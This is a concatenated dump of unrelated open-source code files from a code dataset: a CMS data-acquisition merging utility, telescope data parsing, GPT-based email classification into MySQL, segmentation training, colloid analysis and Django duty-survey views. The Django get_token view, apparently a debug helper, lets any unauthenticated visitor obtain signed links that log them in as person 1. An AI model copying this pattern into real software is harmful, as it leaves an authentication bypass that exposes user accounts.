self.logger.fatal('IOError opening destination file path '+ destinationpath + ' errno:'+str(ex.errno)+' .Terminating script')\n #assert (terminate script) if data destination dir is not available\n os._exit(6)\n raise ex\n\n length=16*1024\n adler32c=1\n file_size=0\n with open(os.path.join(dirname,ifile), 'rb') as fsrc:\n file_created=True\n while 1:\n buf = fsrc.read(length)\n if not buf:\n break\n read_len=len(buf)\n file_size+=read_len\n if doChecksum:\n adler32c=zlib.adler32(buf,adler32c)\n if dst:\n dst.write(buf)\n bw_cnt+=read_len\n copy_size += file_size\n #adler32c = adler32 & 0xffffffff\n if doChecksum and ifilecksum != (adler32c & 0xffffffff):\n self.logger.fatal(\"Checksum mismatch detected while reading file \" + ifile + \". expected:\"+str(ifilecksum)+\" obtained:\"+str(adler32c&0xffffffff))\n if file_size!=ifilesize:\n self.logger.fatal(\"Size mismatch is detected while reading file \" + ifile + \". expected:\"+str(ifilesize)+\" obtained:\"+str(file_size))\n if doChecksum:\n adler32accum = zlibextras.adler32_combine(adler32accum,adler32c,ifilesize) #& 0xffffffff\n\n if dst:\n dst.close()\n\n #delete input files\n for input in self.inputs:\n ifile = input.getFieldByName('Filelist')\n if not ifile:\n continue\n try:os.remove(os.path.join(dirname,ifile))\n except Exception as ex:\n self.logger.exception(ex)\n\n self.setFieldByName(\"Filesize\",json_size)\n if doChecksum:\n self.setFieldByName(\"FileAdler32\",ccomb & 0xffffffff)\n else:\n self.setFieldByName(\"FileAdler32\",-1)\n checks_pass = (ccomb == adler32accum or not doChecksum ) and (copy_size == json_size)\n self.logger.info('checks pass:'+str(checks_pass)+' created:'+str(file_created)+' size:'+str(copy_size))\n return checks_pass,copy_size\n\n def exists(self):\n return os.path.exists(self.filepath)\n\n #write self.outputData in json self.filepath\n def writeout(self,empty=False,verbose=True):\n filepath = self.filepath\n outputData = self.data\n self.logger.info(filepath)\n\n try:\n with open(filepath,\"w\") as fi:\n if empty==False:\n json.dump(outputData,fi)\n except Exception as e:\n if verbose:\n self.logger.exception(e)\n else:\n self.logger.warning('unable to writeout ' + filepath)\n return False\n return True\n\n #TODO:make sure that the file is copied only once\n def esCopy(self, keepmtime=True):\n if not self.exists(): return\n if self.filetype in TO_ELASTICIZE:\n esDir = os.path.join(self.dir,ES_DIR_NAME)\n if os.path.isdir(esDir):\n newpathTemp = os.path.join(esDir,self.basename+TEMPEXT)\n newpath = os.path.join(esDir,self.basename)\n retries = 5\n while True:\n try:\n if keepmtime:\n shutil.copy2(self.filepath,newpathTemp)\n else:\n shutil.copy(self.filepath,newpathTemp)\n break\n except (OSError,IOError) as e:\n retries-=1\n if retries == 0:\n self.logger.exception(e)\n return\n #raise e #non-critical exception\n else:\n time.sleep(0.5)\n retries = 5\n while True:\n try:\n os.rename(newpathTemp,newpath)\n break\n except (OSError,IOError) as e:\n retries-=1\n if retries == 0:\n self.logger.exception(e)\n return\n #raise e #non-critical exception\n else:\n time.sleep(0.5)\n\n\n def merge(self,infile):\n defs,oldData = self.definitions,self.data[\"data\"][:] #TODO: check infile definitions\n jsdfile = infile.jsdfile\n host = infile.host\n newData = infile.data[\"data\"][:]\n\n self.logger.debug(\"old: %r with new: %r\" %(oldData,newData))\n result=Aggregator(defs,oldData,newData).output()\n self.logger.debug(\"result: %r\" %result)\n self.data[\"data\"] = result\n self.data[\"definition\"] = jsdfile\n self.data[\"source\"] = host\n\n self.inputs.append(infile)\n pbOutput = False\n if self.filetype!=STREAMDQMHISTOUTPUT:\n #append list of files if this is json metadata stream\n try:\n findex,ftype = self.getFieldIndex(\"Filelist\")\n flist = newData[findex].split(',')\n for l in flist:\n if l.endswith('.jsndata'):\n if not l.startswith('/'):\n self.inputData.append(os.path.join(self.dir,l))\n else:\n self.inputData.append(l)\n elif l.endswith('.pb'):\n pbOutput=True\n except Exception as ex:\n self.logger.exception(ex)\n self.writeout()\n\n #detect streams with pb files as DQM Histogram streams and change outfile type\n if pbOutput:\n self.filetype = STREAMDQMHISTOUTPUT\n\n def updateData(self,infile):\n self.data[\"data\"]=infile.data[\"data\"][:]\n\n def isJsonDataStream(self):\n if len(self.inputData)>0:return True\n return False\n\n def mergeAndMoveJsnDataMaybe(self,outDir, removeInput=True, dropAtFU=False):\n if len(self.inputData):\n try:\n outfile = os.path.join(self.dir,self.name+'.jsndata')\n command_args = [\"jsonMerger\",outfile]\n for fid in self.inputData:\n command_args.append(fid)\n p = subprocess.Popen(command_args,stdout=subprocess.PIPE,stderr=subprocess.STDOUT)\n p_out,p_err = map(decodecstr,p.communicate())\n #p_out,p_err = map(str,p.communicate())\n if p.returncode!=0:\n self.logger.error('jsonMerger returned with exit code '+str(p.returncode)+' and response: ' + str(p_out) + '. Merging parameters given:'+str(command_args))\n return False\n except Exception as ex:\n self.logger.exception(ex)\n return False\n if removeInput:\n for f in self.inputData:\n try:\n os.remove(f)\n except:\n pass\n try:\n self.setFieldByName(\"Filesize\",str(os.stat(outfile).st_size))\n self.setFieldByName(\"FileAdler32\",\"-1\")\n self.writeout()\n jsndatFile = fileHandler(outfile)\n if not dropAtFU:\n result,cs = jsndatFile.moveFile(os.path.join(outDir, os.path.basename(outfile)),adler32=False,createDestinationDir=False,missingDirAssert=True)\n if not result: return False\n else:\n jsndatFile.deleteFile()\n except Exception as ex:\n self.logger.error(\"Unable to copy jsonStream data file \"+str(outfile)+\" to output.\")\n self.logger.exception(ex)\n return False\n return True\n\n\n def mergeDQM(self,executable,install_dir,outDir,detFastHadd=True,setAsError=False):\n outputName,outputExt = os.path.splitext(self.basename)\n outputName+='.pb'\n fullOutputPath = os.path.join(outDir,outputName)\n if detFastHadd:\n command_args = [executable,install_dir,\"add\",\"-o\",fullOutputPath]\n else:\n command_args = [\"/usr/bin/fastHadd\",\"add\",\"-o\",fullOutputPath]\n\n totalEvents = self.getFieldByName(\"Processed\")+self.getFieldByName(\"ErrorEvents\")\n\n processedEvents = 0\n acceptedEvents = 0\n errorEvents = 0\n\n numFiles=0\n inFileSizes=[]\n for f in self.inputs:\n# try:\n fname = f.getFieldByName('Filelist')\n fullpath = os.path.join(outDir,fname)\n try:\n proc = f.getFieldByName('Processed')\n acc = f.getFieldByName('Accepted')\n err = f.getFieldByName('ErrorEvents')\n #self.logger.info('merging file : ' + str(fname) + ' counts:'+str(proc) + ' ' + str(acc) + ' ' + str(err))\n if fname:\n pbfsize = os.stat(fullpath).st_size\n inFileSizes.append(pbfsize)\n command_args.append(fullpath)\n numFiles+=1\n processedEvents+= proc\n acceptedEvents+= acc\n errorEvents+= err\n else:\n if proc>0:\n self.logger.info('no histograms pb file : '+ str(fullpath))\n errorEvents+= proc+err\n\n\n except OSError as ex:\n #file missing?\n errorEvents+= f.getFieldByName('Processed') + f.getFieldByName('ErrorEvents')\n self.logger.error('fastHadd pb file is missing? : '+ fullpath)\n self.logger.exception(ex)\n\n filesize=0\n hasError=False\n if numFiles>0:\n time_start = time.time()\n if setAsError:\n hasError=True\n else:\n p = subprocess.Popen(command_args,shell=False,stdout=subprocess.PIPE,stderr=subprocess.STDOUT)\n p_out,p_err = map(decodecstr,p.communicate())\n time_delta = time.time()-time_start\n if p.returncode!=0:\n if len(p_out)>100: p_out = p_out[:100]\n self.logger.error('fastHadd returned with exit code '+str(p.returncode)+' and response: ' + str(p_out) + '. Merging parameters given:'+str(command_args) +' ,file sizes(B):'+str(inFileSizes))\n #DQM more verbose debugging\n try:\n filesize = os.stat(fullOutputPath).st_size\n self.logger.error('fastHadd reported to fail at merging, while output pb file exists! '+ fullOutputPath + ' with size(B): '+str(filesize))\n except:\n pass\n self.setFieldByName('ReturnCodeMask', str(p.returncode))\n hasError=True\n else:\n ret_len=0\n try:\n ret_len=len(p_out)\n except:\n pass\n self.logger.info('fastHadd merging of ' + str(len(inFileSizes)) + ' files took ' + str(time_delta) + ' seconds')\n if ret_len>0:\n if ret_len<100:\n self.logger.info('fastHadd output:'+ p_out)\n else:\n self.logger.info('fastHadd output (truncated):'+ p_out[:100])\n\n for f in command_args[5:]:\n try:\n if hasError==False or setAsError==True: os.remove(f)\n except OSError as ex:\n self.logger.warning('exception removing file '+f+' : '+str(ex))\n else:\n hasError=True\n\n if hasError:\n errorEvents+=processedEvents\n processedEvents=0\n acceptedEvents=0\n outputName=\"\"\n filesize=0\n\n #correct for the missing event count in input file (when we have a crash)\n if totalEvents>processedEvents+errorEvents: errorEvents += totalEvents - processedEvents - errorEvents\n\n self.setFieldByName('Processed',str(processedEvents))\n self.setFieldByName('Accepted',str(acceptedEvents))\n self.setFieldByName('ErrorEvents',str(errorEvents))\n self.setFieldByName('Filelist',outputName)\n self.setFieldByName('Filesize',str(filesize))\n #self.esCopy() #happens after move to output\n try:self.data['MergingTime']=time_delta\n except:pass\n try:self.data['MergingTimePerFile']=time_delta/numFiles\n except:self.data['MergingTimePerFile']=0\n #fastHadd installation directory\n if detFastHadd:\n self.data['fastHaddInstPath']=install_dir\n\n self.writeout()\n return outputName\n\n\nclass Aggregator(object):\n def __init__(self,definitions,newData,oldData):\n self.logger = logging.getLogger(self.__class__.__name__)\n self.definitions = definitions\n self.newData = newData\n self.oldData = oldData\n\n def output(self):\n self.result = list(map(self.action,self.definitions,self.newData,self.oldData))\n return self.result\n\n def action(self,definition,data1,data2=None):\n actionName = \"action_\"+definition[\"operation\"]\n if hasattr(self,actionName):\n try:\n return getattr(self,actionName)(data1,data2)\n except AttributeError as e:\n self.logger.exception(e)\n return None\n else:\n self.logger.warning(\"bad operation: %r\" %actionName)\n return None\n\n def action_binaryOr(self,data1,data2):\n try:\n res = int(data1) | int(data2)\n except TypeError as e:\n self.logger.exception(e)\n res = 0\n return str(res)\n\n def action_merge(self,data1,data2):\n if not data2: return data1\n file1 = fileHandler(data1)\n\n file2 = fileHandler(data2)\n newfilename = \"_\".join([file2.run,file2.ls,file2.stream,file2.host])+file2.ext\n file2 = fileHandler(newfilename)\n\n if not file1 == file2:\n if data1: self.logger.warning(\"found different files: %r,%r\" %(file1.filepath,file2.filepath))\n return file2.basename\n return file1.basename\n\n def action_sum(self,data1,data2):\n try:\n res = int(data1) + int(data2)\n except TypeError as e:\n self.logger.exception(e)\n res = 0\n return str(res)\n\n def action_same(self,data1,data2):\n if str(data1)=='' or str(data1)=='0' or str(data1)=='N/A':\n return str(data2)\n if str(data2)=='' or str(data2)=='0' or str(data2)=='N/A':\n return str(data1)\n if str(data1) == str(data2):\n return str(data1)\n else:\n return \"N/A\"\n\n def action_cat(self,data1,data2):\n if data2 and data1: return str(data1)+\",\"+str(data2)\n elif data1: return str(data1)\n elif data2: return str(data2)\n else: return \"\"\n\n def action_adler32(self,data1,data2):\n return \"-1\"\n","repo_name":"cmsdaq/hltd","sub_path":"python/aUtils.py","file_name":"aUtils.py","file_ext":"py","file_size_in_byte":42214,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"4107177411","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"\nname: meta_parse\ndate: 8 aug 2015\nauthors: Evan Gall, Erick Daniszewski\ndescription:\n Command line tool to format SRT spectrum output data files to a gnuplot-readable format.\n The current output format is given by the example below:\n\n date obsn az el freq ...\n ----- ----- ----- ----- ----\n 2015:208:19:08:13 0 0 60 1421.5000 ...\n 2015:208:19:08:26 1 0 60 1421.5000 ...\n ... ... ... ... ...\n\"\"\"\nfrom argparse import ArgumentParser\nimport time\n\n\ndef info_parse(input_file, output_file):\n \"\"\"\n Parses information from the input file then formats it so it is gnuplot readable and\n writes the formatted data to a file.\n\n :param input_file: file name of the file to parse\n :type input_file: str\n\n :param output_file: file name the formatted data will be saved to\n :type output_file: str\n\n :return: None\n \"\"\"\n # open the input file and read the data, line by line, into the input data list. Each line\n # that is read in will be split (by spaces) into a list, and any empty indicies in that list\n # will be filtered out. After this process, the input_data file should be a list of lists.\n with open(input_file, 'rb') as f:\n input_data = [filter(None, line.replace('\\n', '').split(' ')) for line in f.readlines()]\n\n header_info = extract_header_info(input_data) # get the column labels\n data = extract_values(input_data) # get the data rows\n\n # determine the formatting separation. this works by checking for the max size of the string\n # at the i-th index of every list in the data list, then adding an arbitrary spacer distance\n # (which in this case is 5). This max-size data is used to generate a formatter string which\n # denotes left-alignment and ensures column width of max_size+5\n max_vals = []\n for i in range(len(data[0])-1):\n max_val = 0\n for j in range(len(data)-1):\n max_val = max(max_val, len(data[j][i]))\n max_vals.append(str(max_val + 5))\n\n formatter_string = '{:<' + '}{:<'.join(max_vals) + '}'\n\n # write the data to the file\n with open(output_file, 'w') as f:\n # write the header to the file\n f.write('#' + formatter_string.format(*header_info) + '\\n')\n\n # write the data to the file\n for data_row in data:\n f.write(' ' + formatter_string.format(*data_row) + '\\n')\n\n\ndef extract_header_info(data):\n \"\"\"\n Extract column header info from file\n\n :param data:\n :return:\n \"\"\"\n header_info = []\n for line in data[:2]:\n if 'MHz' in line:\n # We don't use 'MHz', and it messes with our ordering. The solution? Get rid of it!\n line.remove('MHz')\n header_info.extend(line[::2])\n return header_info\n\n\ndef extract_values(data):\n \"\"\"\n Extract data values from file\n\n :param data:\n :return:\n \"\"\"\n values = []\n tmp = []\n for i, line in enumerate(data):\n if i % 4 == 0 or i % 4 == 1:\n if 'MHz' in line:\n # We don't use 'MHz', and it messes with our ordering. The solution? Get rid of it!\n line.remove('MHz')\n tmp.extend(line[1::2])\n\n if i % 4 == 1:\n values.append(tmp)\n tmp = []\n\n return values\n\n\nif __name__ == \"__main__\":\n # -----------------------\n # Argument Parser Setup\n # -----------------------\n description = 'parser to format data into a gnuplot-readable form. meta_parse extracts the meta-information ' \\\n 'recorded for each observation in the data file. the output fileit generates contains rows ' \\\n 'for every observation with associated meta-information and columns corresponding to each bit ' \\\n 'of meta-information, e.g.: \\n\\n date, obsn, az, el, freq_MHz, Tsys, Tant, vlsr, glat, glon, ' \\\n 'source, Fstart, fstop, spacing, bw, fbw, nfreq, nsam, npoint, integ, sigma'\n\n in_help = 'name of the file to parse'\n out_help = 'name of the output file. if unspecified, the file will be named in the format: YYYY_MM_DD.hh-mm-ss.txt'\n\n dlft_out = 'meta_{}.txt'.format(time.strftime(\"%Y_%m_%d.%H-%M-%S\"))\n\n # Initialize instance of an argument parser\n parser = ArgumentParser(description=description)\n\n # Add required arguments\n parser.add_argument('input_file', help=in_help, type=str)\n\n # Add optional arguments, with given default values if user gives no args\n parser.add_argument('-o', '--output', default=dlft_out, type=str, help=out_help)\n\n # Get the arguments\n args = parser.parse_args()\n\n # -----------------------\n # Parse the data\n # -----------------------\n info_parse(args.input_file, args.output)\n","repo_name":"BenningtonCS/Telescope-2014","sub_path":"utils/gnuplot/meta_parse.py","file_name":"meta_parse.py","file_ext":"py","file_size_in_byte":4881,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"75"} +{"seq_id":"16624861072","text":"import json\n\nimport APIrequests\nimport os\nimport mysql.connector\nimport time\n\nprocessedDir = 'processedEmails/'\ntokensUsed = 0\n\nmydb = mysql.connector.connect(\n host=\"\",\n user=\"\",\n password=\"\",\n database=\"\"\n)\n\n\ndef str2bool(v):\n return v.lower() in (\"true\", \"1\")\n\n\ntotalProcessTime = \"\"\ntotalExtractionTime = \"\"\ntotalMatchingTime = \"\"\n\nmycursor = mydb.cursor()\n\ntst = time.time()\nfor count, file in enumerate(os.listdir(processedDir)):\n pst = time.time()\n\n currentFile = str(open(processedDir + '/' + file, 'r', encoding='utf-8').read())\n\n classifierResult = (APIrequests.gpt_classifier(str(open(processedDir + '/' + file, 'r', encoding='utf-8').read())))\n tokensUsed += classifierResult[2]\n\n time.sleep(0.5)\n\n while classifierResult[0] in [\"\", None] or classifierResult[1] in [\"\", None]:\n classifierResult = (\n APIrequests.gpt_classifier(currentFile))\n tokensUsed += classifierResult[2]\n time.sleep(0.5)\n\n # extract info from eamils already in DB\n mycursor.execute(\"SELECT id, company, object from llm4pm.emaildata\")\n\n sqlresult = mycursor.fetchall()\n\n time.sleep(0.5)\n\n match = bool(0)\n matchID = None\n\n fileMatchingStart = time.time()\n\n for x in sqlresult:\n\n time.sleep(0.5)\n\n # matching of company and object with entries in database\n comparison = APIrequests.gpt_entryComparer(x[1], x[2], classifierResult[0], classifierResult[1])\n comparisonResult = str2bool(comparison[0])\n tokensUsed += comparison[1]\n\n if not comparisonResult: # FALSE, no match found\n continue\n\n else: # TRUE, match found\n match = True\n matchID = x[0]\n break\n\n fileMatchingEnd = time.time()\n totalMatchingTime += (str((fileMatchingEnd - fileMatchingStart)) + \"\\n\")\n\n extractionStart = time.time()\n # when no existing entry is found, store email information in DB (subject company/object and extracted info)\n if not match:\n # Extract new info without context\n extractedInfo = APIrequests.gpt_extractorNew(currentFile)\n tokensUsed += extractedInfo[1]\n\n sql = \"INSERT INTO llm4pm.emaildata (company, object, extractedInfo) VALUES (%s, %s, %s)\"\n val = (classifierResult[0], classifierResult[1], extractedInfo[0])\n mycursor.execute(sql, val)\n mydb.commit()\n # print(\"inserted email: \" + file)\n # print(\"NEW\")\n\n # when an existing entry is found, update the extracted info\n if match:\n # get existing extracted info for use as context\n mycursor.execute(\"SELECT extractedInfo from llm4pm.emaildata WHERE id = \" + str(matchID))\n contextInfo = mycursor.fetchone()\n\n # Extract new info with context\n extractedInfo = APIrequests.gpt_extractorAdd(currentFile, contextInfo)\n\n # Extract new info without context\n # extractedInfo = APIrequests.gpt_extractorNew(currentFile)\n\n filteredInfo = json.dumps(extractedInfo[0])\n\n # update existing entry with new extracted info (overwrites context information)\n # sql = \"UPDATE llm4pm.emaildata set extractedInfo = %s WHERE id = %s\"\n # val = (filteredInfo, matchID)\n\n # insert extracted information in new row, for evaluation purposes\n sql = \"INSERT INTO llm4pm.emaildata (company, object, extractedInfo) VALUES (%s, %s, %s)\"\n val = (classifierResult[0], classifierResult[1], filteredInfo)\n\n mycursor.execute(sql, val)\n mydb.commit()\n\n # print(\"ADD\")\n tokensUsed += extractedInfo[1]\n\n extractionEnd = time.time()\n totalExtractionTime += (str((extractionEnd - extractionStart)) + \"\\n\")\n\n pet = time.time()\n totalProcessTime += (str((pet - pst)) + \"\\n\")\n\ntet = time.time()\nprint(\"Total tokens used: \" + str(tokensUsed))\nprint(\"total time\")\nprint(str(tet - tst))\nprint(\"total process time\")\nprint(totalProcessTime)\nprint(\"total matching time\")\nprint(totalMatchingTime)\nprint(\"total extraction time\")\nprint(totalExtractionTime)\n","repo_name":"ThureWiegel/LLM4PM_API_ACCESS","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4032,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"4792955172","text":"#!/usr/bin/env python\nimport argparse\nimport logging\nimport os\nimport setproctitle\nimport time\nimport gc\n\nimport numpy as np\nimport torch as th\nimport torch.optim as optim\nfrom torch.utils.data import DataLoader\nfrom torch.autograd import Variable\nfrom tqdm import tqdm\n\nimport torchlib.viz as viz\nimport torchlib.utils as utils\n\nimport gapps.datasets as datasets\nimport gapps.segmentation as seg\nimport gapps.metrics as metrics\nimport gapps.segmentation_models as models\n\n\nlog = logging.getLogger(\"gapps_segmentation\")\n\n\ndef main(args):\n if not os.path.exists(args.output):\n os.makedirs(args.output)\n\n dset = datasets.ADESegmentationDataset(\n args.list_train, args)\n val_dset = datasets.ADESegmentationDataset(\n args.list_val, args)\n loader = DataLoader(dset, batch_size=args.batch_size, num_workers=4, shuffle=True)\n val_loader = DataLoader(val_dset, batch_size=args.batch_size)\n\n if args.model == \"baseline\":\n model = models.ReferenceSegmentation()\n elif args.model == \"bilateral\":\n model = models.Bilateral()\n\n crit = th.nn.NLLLoss2d(ignore_index=-1)\n\n if args.cuda:\n model = model.cuda()\n\n optimizer = th.optim.Adam(model.parameters(), lr=args.lr)\n\n env = os.path.basename(args.output)\n checkpointer = utils.Checkpointer(\n args.output, model, optimizer, verbose=False, interval=600)\n callback = seg.Callback(\n model, len(loader), val_loader, env=env)\n\n chkpt_name, _ = checkpointer.load_latest()\n log.info(\"Resuming from latest checkpoint {}.\".format(chkpt_name))\n\n ema = utils.ExponentialMovingAverage([\"loss\", \"acc\"])\n for epoch in range(args.num_epochs):\n # Training\n model.train(True)\n with tqdm(total=len(loader), unit=' batches') as pbar:\n # TODO: calculate accuracy\n pbar.set_description(\"Epoch {}/{}\".format(epoch+1, args.num_epochs))\n callback.on_epoch_begin(epoch)\n for batch_id, batch in enumerate(loader):\n optimizer.zero_grad()\n pred, loss = seg.forward_with_loss(batch, model, crit, cuda=args.cuda)\n loss.backward()\n optimizer.step()\n\n acc, _ = metrics.accuracy(batch, pred)\n\n ema.update(\"loss\", loss.data[0])\n ema.update(\"acc\", acc) \n\n logs = {\"loss\": ema[\"loss\"], \"acc\": ema[\"acc\"]*100}\n pbar.set_postfix(logs)\n pbar.update(1)\n checkpointer.periodic_checkpoint(epoch)\n\n # if pbar.n % 100 == 0:\n callback.on_batch_end(batch_id, logs)\n\n # if pbar.n == 5:\n # break\n\n # Validation\n model.train(False)\n with tqdm(total=len(val_loader), unit=' batches') as pbar:\n pbar.set_description(\"Epoch {}/{} (val)\".format(epoch+1, args.num_epochs))\n avg = utils.Averager([\"loss\", \"acc\"])\n for batch_id, batch in enumerate(val_loader):\n pred, loss = seg.forward_with_loss(batch, model, crit, cuda=args.cuda)\n\n acc, nvalid = metrics.accuracy(batch, pred)\n\n avg.update(\"loss\", loss.data[0], count=pred.shape[0])\n avg.update(\"acc\", acc, count=nvalid) \n\n break\n\n logs = {\"loss\": avg[\"loss\"], \"acc\": avg[\"acc\"]*100}\n pbar.set_postfix(logs)\n\n callback.on_epoch_end(epoch, logs)\n\n # save\n checkpointer.on_epoch_end(epoch)\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n # Path related arguments\n parser.add_argument('--list_train',\n default='data/ade20k/ADE20K_object150_train.txt')\n parser.add_argument('--list_val',\n default='data/ade20k/ADE20K_object150_val.txt')\n parser.add_argument('--root_img',\n default='data/ade20k/ADEChallengeData2016/images')\n parser.add_argument('--root_seg',\n default='data/ade20k/ADEChallengeData2016/annotations')\n\n # Data related arguments\n parser.add_argument('--num_val', default=128, type=int,\n help='number of images to evalutate')\n parser.add_argument('--num_class', default=150, type=int,\n help='number of classes')\n parser.add_argument('--imgSize', default=384, type=int,\n help='input image size')\n parser.add_argument('--segSize', default=384, type=int,\n help='output image size')\n\n parser.add_argument(\"--model\", default=\"baseline\", choices=[\"baseline\", \"bilateral\"])\n parser.add_argument(\"--output\", default=\"output/segmentation\")\n parser.add_argument(\"--lr\", type=float, default=1e-4)\n parser.add_argument(\"--batch_size\", type=int, default=8)\n parser.add_argument(\"--num_epochs\", type=int, default=100)\n parser.add_argument(\"--no-cuda\", dest=\"cuda\", action=\"store_false\")\n parser.add_argument(\"--nfilters\", type=int, default=9)\n parser.add_argument(\"--fsize\", type=int, default=5)\n parser.set_defaults(cuda=True)\n args = parser.parse_args()\n\n logging.basicConfig(\n format=\"[%(process)d] %(levelname)s %(filename)s:%(lineno)s | %(message)s\")\n log.setLevel(logging.INFO)\n setproctitle.setproctitle('gapps_segmentation')\n\n main(args)\n","repo_name":"mgharbi/gradient_apps","sub_path":"bin/train_segmentation.py","file_name":"train_segmentation.py","file_ext":"py","file_size_in_byte":4951,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"75"} +{"seq_id":"30683960385","text":"import sys, os.path, warnings\nimport numpy as np\nfrom colloids import experiment as xp\nfrom colloids.progressbar import ProgressBar\nfrom colloids import particles\n\nif __name__ == '__main__':\n for trname in sys.argv[1:]:\n print(trname)\n x = xp.Experiment(trname)\n pro = ProgressBar(x.size)\n \n #bounding box\n m = []\n M = []\n for t, name in x.enum():\n pos = np.loadtxt(name, skiprows=2)\n m.append(pos.min(0))\n M.append(pos.max(0))\n m = np.min(m,0)\n M = np.max(M, 0)\n \n #Compute structure factor at each time\n Ss = np.zeros([x.size, 128])\n for t, name in x.enum():\n Ss[t] = particles.structure_factor(np.loadtxt(name, skiprows=2)-m, 128, M-m, maxNvec=300)\n pro.animate(t)\n #save in 0th value the value of q1, so that the q axis is q1*np.arange(len(S))\n Ss[:,0] = 2*np.pi/np.max(M-m)\n np.save(\n os.path.join(x.path, os.path.splitext(x.trajfile)[0]+'_structure_factor.npy'), \n Ss\n )\n #use the last Ss (a priori the most developped) to get the first and second mimimum\n fm = 1 + np.argmin(Ss[-1,1:])\n fM = fm + np.argmax(Ss[-1,fm:])\n sm = fM + np.argmin(Ss[-1,fM:])\n qmax = (Ss[:,fm:sm]*np.arange(fm,sm)).sum(1)/Ss[:,fm:sm].sum(1)\n peak_value = Ss[:,fm:sm].sum(1)\n np.savetxt(\n os.path.join(x.path, os.path.splitext(x.trajfile)[0]+'.qmax'), \n np.column_stack((qmax * Ss[0,0], peak_value))\n )\n \n","repo_name":"MathieuLeocmach/gel-analysis","sub_path":"structure_factor.py","file_name":"structure_factor.py","file_ext":"py","file_size_in_byte":1586,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"10334460087","text":"from datetime import timedelta\n\nfrom django.shortcuts import render, redirect\nfrom django.http import HttpResponse\nfrom django.core.mail import EmailMessage\nfrom django.core.signing import TimestampSigner, SignatureExpired, BadSignature\nfrom django.urls import reverse\nfrom django.contrib.sites.shortcuts import get_current_site\n\nfrom entitaet.models import Person\nfrom entitaet.login import save_login, require_login, check_permission\nfrom .models import Dienst, Teilnahme\n\n\nsigner_umfragen = TimestampSigner(salt=\"DienstUmfrage\")\n\n\ndef umfrage_antwort(request, token, antwort):\n try:\n person_id, dienst_id = \\\n signer_umfragen.unsign(token, max_age=timedelta(days=30)).split(\":\")\n person = Person.objects.get(pk=person_id)\n dienst = Dienst.objects.get(pk=dienst_id)\n except (Person.DoesNotExist, BadSignature):\n return HttpResponse(\"Authorization failed\", status=403)\n except SignatureExpired:\n return HttpResponse(\"Signature expired\", status=401)\n else:\n save_login(request, person)\n\n teilnahme, _ = Teilnahme.objects.get_or_create(person=person, dienst=dienst)\n teilnahme.vorab = antwort\n teilnahme.save()\n\n return redirect(reverse(\"dienst_info\", kwargs={\"dienst_id\": dienst.id}))\n\n\n@require_login\ndef umfrage_versenden(request, dienst_id):\n try:\n dienst = Dienst.objects.get(pk=dienst_id)\n check_permission(request, dienst.gruppe, 3)\n except Dienst.DoesNotExist:\n pass\n except ValueError:\n return HttpResponse(\"Forbidden\", status=403)\n else:\n mitglieder = dienst.gruppe.get_mitglieder()\n for person in mitglieder:\n if not person.mail:\n # TODO what now?\n continue\n\n token = signer_umfragen.sign(\"{}:{}\".format(person.id, dienst.id))\n domain = get_current_site(request).domain\n moeglichkeiten = Teilnahme.OPTIONS\n\n links = []\n for mc, ml in moeglichkeiten:\n path = reverse(\"umfrage_antwort\", kwargs={\"token\": token, \"antwort\": mc})\n link = \"{}://{}{}\".format(request.scheme, domain, path)\n links.append((link, ml))\n\n EmailMessage(subject=\"Abfrage: {}\".format(dienst), body=\" / \".join([link for link, ml in links]), to=[person.mail]).send()\n\n return HttpResponse(\"Versendet\")\n\n\n@require_login\ndef anwesenheit_setzen(request, dienst_id, person_id, vorab, ist):\n try:\n dienst = Dienst.objects.get(pk=dienst_id)\n person = Person.objects.get(pk=person_id)\n # TODO ausnahme fuer eigene dienste (person == session && dienst passt)\n check_permission(request, dienst.gruppe, 4)\n except (Person.DoesNotExist, Dienst.DoesNotExist):\n pass\n except ValueError:\n return HttpResponse(\"Forbidden\", status=403)\n else:\n teilnahme, _ = Teilnahme.objects.get_or_create(person=person, dienst=dienst)\n teilnahme.vorab = vorab\n teilnahme.ist = ist\n teilnahme.save()\n\n return redirect(reverse(\"dienst_info\", kwargs={\"dienst_id\": dienst.id}))\n\n\n@require_login\ndef dienst_info(request, dienst_id):\n try:\n dienst = Dienst.objects.get(pk=dienst_id)\n check_permission(request, dienst.gruppe, 3)\n except Dienst.DoesNotExist:\n pass\n except ValueError:\n return HttpResponse(\"Forbidden\", status=403)\n else:\n mitglieder = dienst.gruppe.get_mitglieder()\n teilnahmen = []\n for mitglied in mitglieder:\n try:\n teilnahme = Teilnahme.objects.get(person=mitglied, dienst=dienst)\n except Teilnahme.DoesNotExist:\n teilnahme = Teilnahme(person=mitglied, dienst=dienst)\n teilnahmen.append({\"person\": mitglied, \"teilnahme\": teilnahme})\n\n return render(request, \"dienst/info.html\", {\"dienst\": dienst, \"teilnahmen\": teilnahmen, \"optionen\": Teilnahme.OPTIONS})\n\n\ndef get_token(request):\n token = signer_umfragen.sign(\"1:1\")\n domain = get_current_site(request).domain\n path_an = reverse(\"umfrage_antwort\", kwargs={\"token\": token, \"antwort\": Teilnahme.ANWESEND})\n link_an = \"{}://{}{}\".format(request.scheme, domain, path_an)\n path_ab = reverse(\"umfrage_antwort\", kwargs={\"token\": token, \"antwort\": Teilnahme.ABWESEND})\n link_ab = \"{}://{}{}\".format(request.scheme, domain, path_ab)\n path_unklar = reverse(\"umfrage_antwort\", kwargs={\"token\": token, \"antwort\": Teilnahme.UNKLAR})\n link_unklar = \"{}://{}{}\".format(request.scheme, domain, path_unklar)\n\n links = \" - \".join([\"{}\".format(link, label) for label, link in {\"an\": link_an, \"ab\": link_ab, \"unklar\": link_unklar}.items()])\n return HttpResponse(links)\n","repo_name":"prauscher/thwin","sub_path":"dienst/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4734,"program_lang":"python","lang":"de","doc_type":"code","stars":2,"dataset":"github-code","pt":"75"} +{"seq_id":"29213469194","text":"import requests\n\nheaders = { 'User-Agent': 'Mozilla/5.0 (Windows NT 6.0; WOW64; rv:24.0) Gecko/20100101 Firefox/24.0' 